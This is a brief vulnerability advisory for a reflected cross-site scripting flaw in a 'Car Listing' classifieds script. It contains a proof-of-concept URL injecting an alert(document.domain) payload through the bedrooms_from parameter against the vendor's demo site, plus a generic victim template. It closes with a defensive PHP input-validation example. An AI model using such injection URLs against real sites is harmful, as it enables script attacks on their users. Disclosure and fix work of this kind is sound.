endLesS
Webmaster
< ------------------- header data start ------------------- >
# Application Name: Car Listing Cross Site Scripting Vuln.
# Author: expulse ~ Bug Researchers
# Date: 01.08.2011
# Example:
http://www.classifiedsgeek.com/car-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=>**********alert(document.domain)</script>
# Vulnerability Type: Reflected XSS
# Fix: Harmful characters must be filtered.
< -- bug code start -- >
http://victim/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
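The fix noted above, sketched as an added example that is not the vendor's preview.php code: because bedrooms_from should only ever carry a number, it is validated as an integer on input and HTML-encoded on output rather than stripped of individual characters. The function names, the 0-99 range and the input-field markup are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical handling of the bedrooms_from search parameter (added example).

/** Return bedrooms_from as an int in [0, 99], or null if absent or invalid. */
function parse_bedrooms_from(array $query): ?int
{
    $raw = $query['bedrooms_from'] ?? '';
    if (!is_string($raw) || $raw === '') {
        return null; // array values (bedrooms_from[]=x) and empty values are rejected
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 99], // assumed range
    ]);
    return $value === false ? null : $value;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the search field; the raw request string is never echoed back. */
function render_bedrooms_field(array $query): string
{
    $value = parse_bedrooms_from($query);
    return sprintf(
        '<input type="number" name="bedrooms_from" value="%s">',
        h($value === null ? '' : (string) $value)
    );
}

// Constructed sample inputs: a normal value, markup characters, an array value.
$samples = [
    ['bedrooms_from' => '3'],
    ['bedrooms_from' => '"><b>x</b>'],
    ['bedrooms_from' => ['3']],
];
foreach ($samples as $q) {
    echo render_bedrooms_field($q), PHP_EOL;
}
```

Only the first sample produces a populated field; the other two render an empty value because they fail integer validation.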